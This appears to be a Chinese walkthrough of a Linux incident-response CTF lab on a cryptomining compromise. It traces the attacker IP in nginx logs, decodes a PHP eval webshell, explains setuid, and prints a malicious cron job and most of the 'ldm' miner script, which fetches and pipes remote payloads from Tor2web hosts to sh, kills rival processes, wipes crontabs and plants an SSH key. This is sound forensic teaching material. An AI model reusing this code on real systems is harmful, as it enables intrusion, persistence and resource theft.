玄机靶场–linux实战-挖矿

1、黑客的IP是？ flag格式：flag{黑客的ip地址}，如：flag{127.0.0.1}

查看第一个要求，是找到黑客IP，我们需要查找日志，我们先看采用的程序是哪些

ps aux

看见了php和nginx，我们要看访问IP就要找到日志目录默认在/var/log下

我们不确定，就先查找nginx的配置文件或者直接查找日志文件也可以两种方法

1.第一种

1	find / -name nginx.conf

看见logs/error.log但是别急，下面还有几个引用的配置文件我们再去看一下

有两个文件，我们先看vhost/nginx/的配置文件

然后做题界面提示了服务端口是8081

我们找到了日志文件的目录

目录下有这几个文件

我们先看最大的

1	cat nginx_access_2023-12-22.log \| awk '{print $1}' \| sort \| uniq -c \| sort -nr \| head

将这个IP提交

提示flag正确

2.第二种

1	find / -name .log

www很明显是网页文件目录，我们先看多的文件下的然后在照上面排序查找即可

2、黑客攻陷网站的具体时间是？ flag格式：flag{年-月-日时:分:秒}，如：flag{2023-12-24 22:23:24}

他告诉我们网站的端口是8081，我们上去看看

一个常见的织梦cms，默认后台是/dede/，我们访问一下

我们不知道密码但是黑客进去了，我们翻找一下数据库文件，data/common.inc.php下

本来是准备进MySQL看一下密码的但是，不知道为什么MySQL报错

然后，暴力手段得到账号和密码(本来想看一下hacker的但是写文章靶机时间不足，就先暂时跳过)

1
2
3

user:admin

password:12345678

3、黑客上传webshell的名称及密码是？ flag格式：flag{黑客上传的webshell名称-webshell密码}，如：flag{webshell.php-pass}

找webshell，这里还是两个办法

对网站目录进行打包，然后到本地查杀或在线查杀
将杀毒软件传到服务器然后进行扫描

我用的是第二种方法，用的是SHELLPUB.COM在线查杀

扫出来一个这个，咱们去查看一下

gzuncompress 此函数解压缩压缩的字符串。

base64_decode 进行编码

<?php
// 原始编码字符串
$encoded_string = 'eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==';

// 第一步：Base64 解码
$decoded_base64 = base64_decode($encoded_string);

// 第二步：Gzip 解压
$uncompressed_code = gzuncompress($decoded_base64);

// 打印解码后的内容
echo $uncompressed_code;
?>

得到

1	eval($_POST['cmd']);

4、黑客提权后设置的后门文件名称是？ flag格式：flag{后门文件绝对路径加上名称}，如：flag{/etc/passwd}

直接先查看历史命令

有一个很明显的权限操作

1	chmod 4775 filename

读取的权限等于4用r表示

写入的权限等于2用w表示

执行的权限等于1用x表示

他的权限有一个表示为s

这个是setuid位，setuid 是一种用于提升用户权限的特殊位，使普通用户能够以文件所有者的权限执行某些关键程序

使用方法为

1 2	chmod u+s filename chmod 4755 filename

setgid: 类似于 setuid，但作用于组。当 setgid 位被设置在一个可执行文件上时，执行该文件的用户临时获得该文件所属组的权限。

chmod g+s filename  # 对文件设置 setgid
chmod g+s directory  # 对目录设置 setgid

chmod 2755 filename  # 设置 setgid 位，文件权限为 rwxr-sr-x
chmod 2775 directory  # 设置 setgid 位，目录权限为 rwxr-sr-x

sticky bit : 常用于目录，表示只有文件所有者才能删除该目录中的文件，即使其他用户有写权限。

1 2	chmod +t directory chmod 1777 directory # 设置 sticky bit 位，目录权限为 rwxrwxrwt

5、对黑客上传的挖矿病毒进行分析，获取隐藏的Flag

这种情况我们一般会查看，cpu，网络，进程，端口，历史命令，开机启动项，服务自启动

SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# 定义一个每7分钟运行一次的定时任务
# 任务将在运行前随机休眠一段时间

*/7 * * * * root \
# 1. 生成一个1到29之间的随机数，并将其存储在变量R中。
R=$(shuf -i 1-29 -n 1);

# 2. 根据R的值休眠指定秒数，如果R未设置，则默认为0秒。
sleep ${R:-0};

# 3. 确定 'yes' 命令所在的目录，如果找不到，默认设置为 /usr/bin。
BP=$(dirname "$(command -v yes)");
BP=${BP:-"/usr/bin"};

# 4. 初始化变量G1为 'curl'。检查系统中是否安装了 'curl'，如果没有安装，
#    则在BP目录中查找包含字符串 'CURLOPT_VERBOSE' 的二进制文件，并将G1设置为该文件路径。
G1="curl";
if [ $(curl --version 2>/dev/null | grep "curl " | wc -l) -eq 0 ]; then 
  G1="echo";
  for f in ${BP}/*; do 
    strings $f 2>/dev/null | grep -q "CURLOPT_VERBOSE" && G1="$f" && break;
  done;
fi;

# 5. 初始化变量G2为 'wget'。检查系统中是否安装了 'wget'，如果没有安装，
#    则在BP目录中查找包含字符串 'to <bug-wget@gnu.org>' 的二进制文件，并将G2设置为该文件路径。
G2="wget";
if [ $(wget --version 2>/dev/null | grep "wgetrc " | wc -l) -eq 0 ]; then 
  G2="echo";
  for f in ${BP}/*; do 
    strings $f 2>/dev/null | grep -q "to <bug-wget@gnu.org>" && G2="$f" && break;
  done;
fi;

# 6. 检查 /etc/hosts 文件中是否包含特定的字符串（如 onion.、timesync.su、tor2web），
#    如果找到这些字符串，则将 /etc/hosts 的内容重写为 "127.0.0.1 localhost"。
if [ $(cat /etc/hosts | grep -i "onion.\|timesync.su\|tor2web" | wc -l) -ne 0 ]; then 
  echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;
fi;

# 7. 定义用于 curl 和 wget 的参数。C 为 curl 参数，W 为 wget 参数。
C=" -fsSLk --connect-timeout 26 --max-time 75 ";
W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";

# 8. 定义用于请求的基础URL和路径变量。
H="https://an7kmd2wp4xo7hpr";
T1=".tor2web.su/";
T2=".d2web.org/";
T3=".onion.sh/";
P="src/ldm";

# 9. 通过 curl 或 wget 请求上述URL路径，依次尝试不同的域名后缀（T1、T2、T3）。
#    请求结果通过管道传递给 sh 进行执行。
($G1 $C $H$T1$P || $G1 $C $H$T2$P || $G1 $C $H$T3$P || $G2 $W $H$T1$P || $G2 $W $H$T2$P || $G2 $W $H$T3$P) | sh &

最后的木马名，定义在P里，名字为ldm

1	vim /etc/.cache/ldm

#!/bin/bash
SHELL=/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

ARCH=$(uname -a)
if [[ -f /sbin/apk ]]; then Pref="a"; elif [[ $(echo "${ARCH}"|grep 'Alpine'|wc -l) -eq 0 ]]; then Pref="r"; else Pref="a"; fi
RHOST="https://an7kmd2wp4xo7hpr"
TOR1=".tor2web.su/"
TOR2=".d2web.org/"
TOR3=".onion.sh/"
RPATH1='src/ldm'
RBIN1="${Pref}64x75"
RBIN2="${Pref}32x75"
RPATH2="images/ico/${RBIN1}.ico"
RPATH3="images/ico/${RBIN2}.ico"
RPATH2B="images/${RBIN1}"
RPATH3B="images/${RBIN2}"
#LPATH="${HOME-/tmp}/.cache/"
CTIMEOUT="26"; TIMEOUT="75"
COPTS=" -fsSLk --retry 2 --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT} "
WOPTS=" --quiet --tries=2 --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT} "
tbin=$(command -v yes); bpath=$(dirname "${tbin}"); bpath=${bpath:-"/usr/bin"}
CHKCURL='
  tbin=$(command -v yes); 
  bpath=$(dirname "${tbin}"); 
  curl="curl"; 
  if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then 
    curl="echo"; 
    if [ "${bpath}" != "" ]; then 
      for f in ${bpath}/*; 
      do 
        strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; 
      done; 
    fi; 
  fi; 
  wget="wget"; 
  if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then 
    wget="echo"; 
    if [ "${bpath}" != "" ]; then 
      for f in ${bpath}/*; 
      do 
        strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; 
      done; 
    fi; 
  fi; 
  if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ]; then 
    echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; 
  fi; '
LBIN1="/usr/local/bin/nptd"
LBIN2=".favicon.ico"
LBIN3=".kswapd"
LBIN4="/etc/cron.hourly/cronlog"
LBIN5="/etc/cron.daily/cronlog"
LBIN6="/etc/cron.monthly/cronlog"
LBIN7="/usr/local/bin/npt"
LBIN8="kthrotlds"
LBIN9="${LPATH}.editorinfo"
null=' >/dev/null 2>&1'
skey="
  ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1Sdr0tIIL8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx+AHyvBL8jDZDJ6fuVwEB+aZ8bl/pA5qhFWRRWhONLnLN9RWFx/880msXITwOXjCT3
  Qa6VpAFPPMazJpbppIg+LTkbOEjdDHvdZ8RhEt7tTXc2DoTDcs73EeepZbJmDFP8TCY7hwgLi0XcG8YHkDFoKFUhvSHPkzAsQd9hyOWaI1taLX2VZHAk8rOaYqaRG3URWH3hZvk8Hcgggm2q/
  IQQa9VLlX4cSM4SifM/ZNbLYAJhH1x3ZgscliZVmjB55wZWRL5oOZztOKJT2oczUuhDHM1qoUJjnxopqtZ5DrA76WHz user@localhost
  "
SCN=0


function b() {
    t=$(shuf -i 1-99 -n 1)
    wdog0=$(ps aux|grep -v 'grep'|grep -v defunct|grep -v 'sh '|grep ' sleep 30'|wc -l)
    if [ ${wdog0} -lt 2 ] && [ $t -lt 50 ]; then
        if [ $(command -v timeout|wc -l) -ne 0 ]; then
            timeout 600 $(command -v bash) -c "
      (${curl} ${COPTS} ${RHOST}${TOR1}src/main||${curl} ${COPTS} ${RHOST}${TOR2}src/main||${curl} ${COPTS} ${RHOST}${TOR3}src/main||
      ${wget} ${WOPTS} ${RHOST}${TOR1}src/main||${wget} ${WOPTS} ${RHOST}${TOR2}src/main||${wget} ${WOPTS} ${RHOST}${TOR3}src/main)|
      base64 -d |${sudo} $(command -v bash)" &
        else
            (${curl} ${COPTS} ${RHOST}${TOR1}src/main||${curl} ${COPTS} ${RHOST}${TOR2}src/main||${curl} ${COPTS} ${RHOST}${TOR3}src/main||
      ${wget} ${WOPTS} ${RHOST}${TOR1}src/main||${wget} ${WOPTS} ${RHOST}${TOR2}src/main||${wget} ${WOPTS} ${RHOST}${TOR3}src/main)|
      base64 -d |${sudo} $(command -v bash) &
        fi
        ${sudo} ${rm} -rf main* >/dev/null 2>&1
    fi
    if [ $t -lt 21 ]; then g; fi
    ${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -v ".ntp"|grep -vi "bash"|grep -i "nicehash\|linuxs\|linuxl\|Linux\|
    crawler.weibo\|44444\|cryptonight\|stratum\|gpg-daemon\|jobs.flu.cc\|nmap\|cranberry\|start.sh\|watch.sh\|krun.sh\|killTop.sh\|cpuminer\|
    /60009\|ssh_deny.sh\|clean.sh\|\./over\|mrx1\|redisscan\|ebscan\|redis-cli\|barad_agent\|\.sr0\|clay\|udevs\|\.sshd\|/tmp/init"|
    uniq| while read pid _; 
    do 
      if [[ ${pid} -gt 301 ]] && [[ ! "$pid" == "$$" ]] && [[ ! "$pid" == "$!" ]] && [[ ! "$pid" == "$PPID" ]]; then 
        ${sudo} kill -9 "${pid}"; 
        ${sudo} kill -TERM -"${pid}"; 
      fi; 
    done
    ${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -v ".ntp"|grep -vi "bash"|grep -vi "ssh"|grep -vi 'exim'|
    grep -i "kworkerds\|56416\|xmr\|xig\|ddgs\|minerd\|hashvault\|geqn\|.kthreadd\|httpdz\|kworker\|config.json\|gwjyhs.com\|
    pastebin.com\|sobot.com\|kerbero"
    |uniq| while read pid _; 
    do 
      if [[ ${pid} -gt 301 ]] && [[ ! "$pid" == "$$" ]] && [[ ! "$pid" == "$!" ]] && [[ ! "$pid" == "$PPID" ]]; then 
        ${sudo} kill -9 "${pid}"; 
        ${sudo} kill -TERM -"${pid}"; 
      fi; 
    done
    ${sudo} chattr -i -a ~/.cache >/dev/null 2>&1; 
    if [[ "${LPATH}" != *"/tmp/"* ]]; then
        ${sudo} ${rm} -rf /tmp/* >/dev/null 2>&1
        ${sudo} ${rm} -rf /tmp/.* >/dev/null 2>&1
    else
        ${sudo} ${rm} -f /tmp/* >/dev/null 2>&1
        ${sudo} ${rm} -f /tmp/.* >/dev/null 2>&1
    fi
    hload=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -vi 'java '|grep -vi 'jenkins'|grep -vi 'exim'|awk '{if($3>=54.0) print $11}'|head -n 1)
    [ "${hload}" != "" ] && { ${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -vi "bash"|grep "xmr\|${hload}"|
  while read pid _;
  do 
    if [[ ${pid} -gt 301 ]] && [[ ! "$pid" == "$$" ]] && [[ ! "$pid" == "$!" ]] && [[ ! "$pid" == "$PPID" ]]; then 
      ${sudo} kill -9 "${pid}" >/dev/null 2>&1; 
    fi; 
  done; }
    hload2=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v python|grep -v "${LBIN8}"|grep -vi "bash"|grep -vi 'exim'|awk '{if($3>=0.0) print $2}'|uniq)
    if [[ ! "${hload2}" == "" ]]; then
        for p in ${hload2}; do
            xm=''
            if [[ $p -gt 301 ]] && [[ ! "$pid" == "$$" ]] && [[ ! "$pid" == "$!" ]] && [[ ! "$pid" == "$PPID" ]]; then
                if [ -f /proc/${p}/exe ]; then
                    xmf="$(readlink /proc/${p}/cwd)/$(cat /proc/${p}/comm)"
                    xm=$(grep -i "xmr\|cryptonight\|hashrate" /proc/${p}/exe 2>&1)
                elif [ -f /proc/${p}/comm ]; then
                    xmf="$(readlink /proc/${p}/cwd)/$(cat /proc/${p}/comm)"
                    xm=$(grep -i "xmr\|cryptonight\|hashrate" ${xmf} 2>&1)
                fi
                if [[ "${xm}" == *"matches"* ]] || [[ "$(readlink /proc/${p}/exe)" == *"/tmp/"* ]] || [[ "${xmf}" == *"/tmp/"* ]]; then 
          ${sudo} kill -9 ${p} >/dev/null 2>&1; 
          ${sudo} ${rm} -rf ${xmf} >/dev/null 2>&1; 
        fi
            fi
        done
    fi
    others=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -vi "bash"|grep -vi 'exim'|awk '{if($3>=4.0) print $11}')
    if [  "${others}" != "" ]; then
        for o in ${others}; do
            okill=0
            if [ -f "${o}" ]; then
                if grep -qi 'ddgs' "${o}" 2>/dev/null && grep -qi 'slave' "${o}" 2>/dev/null; then okill=1; fi
                if grep -qi 'kerberods' "${o}" 2>/dev/null || grep -qi 'khugepageds' "${o}" 2>/dev/null; then okill=1; fi
                if [ ${okill} -eq 1 ]; then
                    ${sudo} ps ax|grep -v grep|grep -v defunct|grep "${o}"|while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done
                    ${sudo} chattr -i -a "${o}" >/dev/null 2>&1; ${rm} -rf "${o}" >/dev/null 2>&1
                fi
            fi
        done
    fi
    if [[ ${sudoer} == 1 ]]; then
        ${sudo} chattr -i -a -R /tmp >/dev/null 2>&1; ${sudo} chattr -i -a -R /tmp/ >/dev/null 2>&1
        ${sudo} ln -sf /etc/ld.so.preload /tmp/.ld.so >/dev/null 2>&1
        ${sudo} echo '' >/tmp/.ld.so >/dev/null 2>&1
        ${sudo} ${rm} -rf /etc/ld.so.preload* >/dev/null 2>&1
        ${sudo} ${rm} -rf /var/tmp/* >/dev/null 2>&1
        ${sudo} ${rm} -rf /var/tmp/.* >/dev/null 2>&1
        if [ -d /etc/systemd/system/ ]; then 
      ${sudo} ${rm} -rf /etc/systemd/system/cloud* >/dev/null 2>&1; 
    fi
        if [[ ! "$(crontab -l 2>/dev/null)" == *"${RHOST}"* ]] || [[ "$(crontab -l 2>/dev/null)" == *"3ei.xyz"* ]] || [[ "$(crontab -l 2>/dev/null)" == *"pastebin.com/raw/"* ]]; then
            ${sudo} chattr -a -i /etc/crontab >/dev/null 2>&1; 
      ${sudo} chattr -i -a /var/spool/cron >/dev/null 2>&1; 
      ${sudo} chattr -i -a -R /var/spool/cron/ >/dev/null 2>&1; 
      ${sudo} chattr -i -a /etc/cron.d >/dev/null 2>&1; 
      ${sudo} chattr -i -a -R /etc/cron.d/ >/dev/null 2>&1; 
      ${sudo} chattr -i -a /var/spool/cron/crontabs >/dev/null 2>&1; 
      ${sudo} chattr -i -a -R /var/spool/cron/crontabs/ >/dev/null 2>&1
            ${sudo} ${rm} -rf /var/spool/cron/crontabs/* >/dev/null 2>&1;
      ${sudo} ${rm} -rf /var/spool/cron/crontabs/.* >/dev/null 2>&1; 
      ${sudo} ${rm} -f /var/spool/cron/* >/dev/null 2>&1; 
      ${sudo} ${rm} -f /var/spool/cron/.* >/dev/null 2>&1; 
      ${sudo} ${rm} -f /etc/cron.d/* >/dev/null 2>&1; 
      ${sudo} ${rm} -f /etc/cron.d/.* >/dev/null 2>&1
            if [ -f /sbin/apk ]; then
                ${sudo} mkdir -p /etc/crontabs >/dev/null 2>&1; 
        ${sudo} ${rm} -rf /etc/crontabs/* >/dev/null 2>&1; 
        ${sudo} echo -e "${C1}" > /etc/crontabs/root && 
        ${sudo} echo -e "${C2}" >> /etc/crontabs/root && 
        ${sudo} echo '' >> /etc/crontabs/root 
        && ${sudo} crontab /etc/crontabs/root 2>/dev/null; 
        ${sudo} chattr +i /etc/crontabs/root 2>/dev/null
            elif [ -f /usr/bin/apt-get ]; then
                ${sudo} mkdir -p /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs/root >/dev/null 2>&1
                rs=$(${sudo} echo -e "${C1}" > /var/spool/cron/crontabs/root 2>&1)
                if [[ ${rs} == "" ]]; then 
          ${sudo} echo -e '' >> /var/spool/cron/crontabs/root 2>&1 && 
          ${sudo} chmod 600 /var/spool/cron/crontabs/root && 
          ${sudo} crontab /var/spool/cron/crontabs/root 2>/dev/null; 
        fi
                ${sudo} chattr +i /var/spool/cron/crontabs/root 2>/dev/null
            else
                ${sudo} mkdir -p /var/spool/cron >/dev/null 2>&1; 
        ${sudo} chattr -i -a /var/spool/cron/root >/dev/null 2>&1
                rs=$(${sudo} echo -e "${C1}" > /var/spool/cron/root 2>&1)
                if [[ ${rs} == "" ]]; then
          ${sudo} echo -e '' >> /var/spool/cron/root && 
          ${sudo} crontab /var/spool/cron/root 2>/dev/null; 
        fi
                ${sudo} chattr +i /var/spool/cron/root 2>/dev/null
            fi
            ${sudo} chattr -i -a /etc/crontab >/dev/null 2>&1; rs=$(${sudo} echo -e "${C2}" > /etc/crontab 2>&1)
            if [ -z "${rs}" ]; then ${sudo} echo -e '' >> /etc/crontab && ${sudo} crontab /etc/crontab 2>/dev/null; fi
            ${sudo} mkdir -p /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d/root >/dev/null 2>&1
            rs=$(${sudo} echo -e "${C2}" > /etc/cron.d/root 2>&1 && ${sudo} echo -e '' >> /etc/cron.d/root 2>&1)
            #if [[ ${rs} == "" ]]; then ${sudo} crontab /etc/cron.d/root 2>/dev/null; fi
            ${sudo} chmod 600 /etc/cron.d/root >/dev/null 2>&1; ${sudo} chattr +i /etc/crontab /etc/cron.d/root >/dev/null 2>&1
        fi
        
        ${sudo} mkdir -p "${sshdir}" >/dev/null 2>&1; 
    if [ ! -f ${sshdir}/authorized_keys ]; then 
      ${sudo} touch ${sshdir}/authorized_keys >/dev/null 2>&1; 
    fi
        ${sudo} chattr -i -a ${LPATH} >/dev/null 2>&1; 
    ${sudo} chattr -i -a "${sshdir}" >/dev/null 2>&1; 
    ${sudo} chattr -i -a -R "${sshdir}/" >/dev/null 2>&1; 
    ${sudo} chattr -i -a ${sshdir}/authorized_keys >/dev/null 2>&1
        if [ -n "$(grep -F redis ${sshdir}/authorized_keys)" ] || [ $(wc -l < ${sshdir}/authorized_keys) -gt 50 ]; then 
      ${sudo} echo "${skey}" > ${sshdir}/authorized_keys; 
    fi
        if test "$(${sudo} grep "^${skey}" ${sshdir}/authorized_keys)" != "${skey}"; then  
      ${sudo} echo -e "${skey}" >> ${sshdir}/authorized_keys; 
    fi
        ${sudo} chmod 0700 ${sshdir} >/dev/null 2>&1; 
    ${sudo} chmod 600 ${sshdir}/authorized_keys >/dev/null 2>&1; ${sudo} chattr +i ${sshdir}/authorized_keys >/dev/null 2>&1; 
    ${sudo} ${rm} -rf ${sshdir}/authorized_keys* >/dev/null 2>&1
        [ $(${sudo} cat /etc/hosts|grep -i "onion."|wc -l) -ne 0 ] && { 
      ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; 
      ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; 
      ${sudo} sed -i '/.onion.$/d' /etc/hosts >/dev/null 2>&1; }
        [ $(${sudo} cat /etc/hosts|grep -i "tor2web."|wc -l) -ne 0 ] && { 
      ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; 
      ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; 
      ${sudo} sed -i '/.tor2web.$/d' /etc/hosts >/dev/null 2>&1; }
        [ $(${sudo} cat /etc/hosts|grep -i "timesync.su"|wc -l) -ne 0 ] && { 
      ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; 
      ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; 
      ${sudo} sed -i '/timesync.su$/d' /etc/hosts >/dev/null 2>&1; }
        [ $(${sudo} cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ] && { 
      ${sudo} echo -e '127.0.0.1 localhost' > /etc/hosts >/dev/null 2>&1; }
    else
        if [[ ! "$(crontab -l 2>/dev/null)" == *"${RHOST}"* ]]; then
            crontab -r >/dev/null 2>&1
            (crontab -l >/dev/null 2>&1; echo "${C1}") | crontab -
        fi
    fi
    if [[ $(date +%M) ==  "01" ]] || [[ $(date +%M) ==  "31" ]]; then
        mkdir -p ${LPATH} >/dev/null 2>&1; ${sudo} chattr -i ${LPATH} >/dev/null 2>&1; chmod 1755 ${LPATH} >/dev/null 2>&1
        tbin=$(command -v yes); bpath=$(dirname "${tbin}"); bpath=${bpath:-"/usr/bin"}
        if [ $(rm --help 2>/dev/null|grep " rm does not remove dir"|wc -l) -ne 0 ]; then 
      rm="rm"; 
    elif [ $(rrn --help 2>/dev/null|grep " rm does not remove dir"|wc -l) -ne 0 ]; then 
      rm="rrn"; 
    else 
      rm="echo"; 
      for f in /bin/*; 
      do 
        strings $f 2>/dev/null|grep -qi " rm does not remove dir" && rm="$f" && ${sudo} mv -f $rm /bin/rrn && break; 
      done; 
    fi
        if [ $(curl --help 2>/dev/null|grep -i "Dump libcurl equivalent"|wc -l) -ne 0 ]; then 
      curl="curl"; 
    elif [ $(lxc --help 2>/dev/null|grep -i "Dump libcurl equivalent"|wc -l) -ne 0 ]; then 
      curl="lxc"; 
    else 
      curl="echo"; 
      for f in ${bpath}/*; 
      do 
        strings $f 2>/dev/null|grep -qi "Dump libcurl equivalent" && curl="$f" && ${sudo} mv -f $curl ${bpath}/lxc && break; 
      done; 
    fi
        if [ $(wget --version 2>/dev/null|grep -i "wgetrc "|wc -l) -ne 0 ]; then 
      wget="wget"; 
    elif [ $(lxw --version 2>/dev/null|grep -i "wgetrc "|wc -l) -ne 0 ]; then 
      wget="lxw"; 
    else 
      wget="echo"; 
      for f in ${bpath}/*; 
      do 
        strings $f 2>/dev/null|grep -qi ".wgetrc'-style command" && wget="$f" && ${sudo} mv -f $wget ${bpath}/lxw && break; 
      done; 
    fi
        if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ]; then 
      echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; 
    fi
        if [ $(command -v timeout|wc -l) -ne 0 ]; then
            timeout 600 $(command -v bash) -c "(${curl} ${COPTS} ${RHOST}${TOR1}${RPATH1}||${curl} ${COPTS} ${RHOST}${TOR2}${RPATH1}||
      ${curl} ${COPTS} ${RHOST}${TOR3}${RPATH1}||${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH1}||${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH1}||
      ${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH1})| ${sudo} $(command -v sh)" &
        else
            (${curl} ${COPTS} ${RHOST}${TOR1}${RPATH1}||${curl} ${COPTS} ${RHOST}${TOR2}${RPATH1}||${curl} ${COPTS} ${RHOST}${TOR3}${RPATH1}||
      ${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH1}||${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH1}||${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH1})| ${sudo} $(command -v sh) &
        fi
        ${sudo} ${rm} -rf ldm* >/dev/null 2>&1
    fi
}

function d() {
    CTIMEOUT="26"; TIMEOUT="175"
    COPTS=" -fsSLk --retry 2 --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT} "
    WOPTS=" --quiet --tries=2 --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT} "
    ${sudo} ${rm} -rf "${LPATH}*.ico*" >/dev/null 2>&1
    ${sudo} ${rm} -rf "${LPATH}r64*" >/dev/null 2>&1
    ${sudo} ${rm} -rf "${LPATH}r32*" >/dev/null 2>&1
    ${rm} -rf ${LPATH}${LBIN2} >/dev/null 2>&1
    ${sudo} chattr -i ${LPATH}${LBIN3} >/dev/null 2>&1
    zip=$(unzip --help 2>&1)
    if [[ ${zip} == *"not found"* ]]; then
        RPATH2="images/${RBIN1}"
        RPATH3="images/${RBIN2}"
        LBIN2="${LBIN3}"
    fi
    if [ ! $(echo "${ARCH}"|grep 'x86_64'|wc -l) -eq 0 ]; then
        (${curl} ${COPTS} ${RHOST}${TOR1}${RPATH2} -o ${LPATH}${LBIN2}||${curl} ${COPTS} ${RHOST}${TOR2}${RPATH2} -o ${LPATH}${LBIN2}||${curl} ${COPTS} ${RHOST}${TOR3}${RPATH2} -o ${LPATH}${LBIN2}||${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH2} -O ${LPATH}${LBIN2}||${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH2} -O ${LPATH}${LBIN2}||${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH2} -O ${LPATH}${LBIN2})
        RBIN=${RBIN1}
    else
        (${curl} ${COPTS} ${RHOST}${TOR1}${RPATH3} -o ${LPATH}${LBIN2}||${curl} ${COPTS} ${RHOST}${TOR2}${RPATH3} -o ${LPATH}${LBIN2}||${curl} ${COPTS} ${RHOST}${TOR3}${RPATH3} -o ${LPATH}${LBIN2}||${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH3} -O ${LPATH}${LBIN2}||${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH3} -O ${LPATH}${LBIN2}||${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH3} -O ${LPATH}${LBIN2})
        RBIN=${RBIN2}
    fi
    #chmod +x ${LPATH}${LBIN2}
    if [[ ! ${zip} == *"not found"* ]]; then
        ${rm} -rf ${RBIN}; ${rm} -rf ${LPATH}${LBIN3}
        unzip -qjoP no-password ${LPATH}${LBIN2} >/dev/null 2>&1; sleep 3
        mv ${RBIN} ${LPATH}${LBIN3}
    fi
    if [ ! -f ${LPATH}${LBIN3} ]; then
        if [ ! $(echo "${ARCH}"|grep 'x86_64'|wc -l) -eq 0 ]; then
            (${curl} ${COPTS} ${RHOST}${TOR1}${RPATH2B} -o ${LPATH}${LBIN3}||${curl} ${COPTS} ${RHOST}${TOR2}${RPATH2B} -o ${LPATH}${LBIN3}||${curl} ${COPTS} ${RHOST}${TOR3}${RPATH2B} -o ${LPATH}${LBIN3}||${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH2B} -O ${LPATH}${LBIN3}||${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH2B} -O ${LPATH}${LBIN3}||${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH2B} -O ${LPATH}${LBIN3})
            RBIN=${RBIN1}
        else
            (${curl} ${COPTS} ${RHOST}${TOR1}${RPATH3B} -o ${LPATH}${LBIN3}||${curl} ${COPTS} ${RHOST}${TOR2}${RPATH3B} -o ${LPATH}${LBIN3}||${curl} ${COPTS} ${RHOST}${TOR3}${RPATH3B} -o ${LPATH}${LBIN3}||${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH3B} -O ${LPATH}${LBIN3}||${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH3B} -O ${LPATH}${LBIN3}||${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH3B} -O ${LPATH}${LBIN3})
            RBIN=${RBIN2}
        fi
    fi
    chmod +x ${LPATH}${LBIN3}
    echo always | ${sudo} tee /sys/kernel/mm/transparent_hugepage/enabled >/dev/null 2>&1
    ${sudo} sysctl -w vm.nr_hugepages=128 >/dev/null 2>&1
    ${sudo} chattr +i ${LPATH}${LBIN3} >/dev/null 2>&1
    ${sudo} chattr -i /usr/bin/[${grepmn}] >/dev/null 2>&1
    ${sudo} ps aux|grep -v grep|grep -v defunct|grep -i "${grepmn}"|awk '{print $2}'|while read pid _; do ${sudo} kill -9 "$pid" ; done
    if [[ ${sudoer} == 1 ]]; then
        ${sudo} ${rm} -f /usr/bin/[${grepmn}] >/dev/null 2>&1; ${sudo} cp ${LPATH}${LBIN3} /usr/bin/[${grepmn}] >/dev/null 2>&1; ${sudo} chmod +x /usr/bin/[${grepmn}] >/dev/null 2>&1
        ${sudo} nohup "[${grepmn}]" >/dev/null 2>&1 &
    else
        ${sudo} ${rm} -f ${LPATH}.${LBIN8} >/dev/null 2>&1; ${sudo} cp ${LPATH}${LBIN3} ${LPATH}.${LBIN8} >/dev/null 2>&1; ${sudo} chmod +x ${LPATH}.${LBIN8} >/dev/null 2>&1
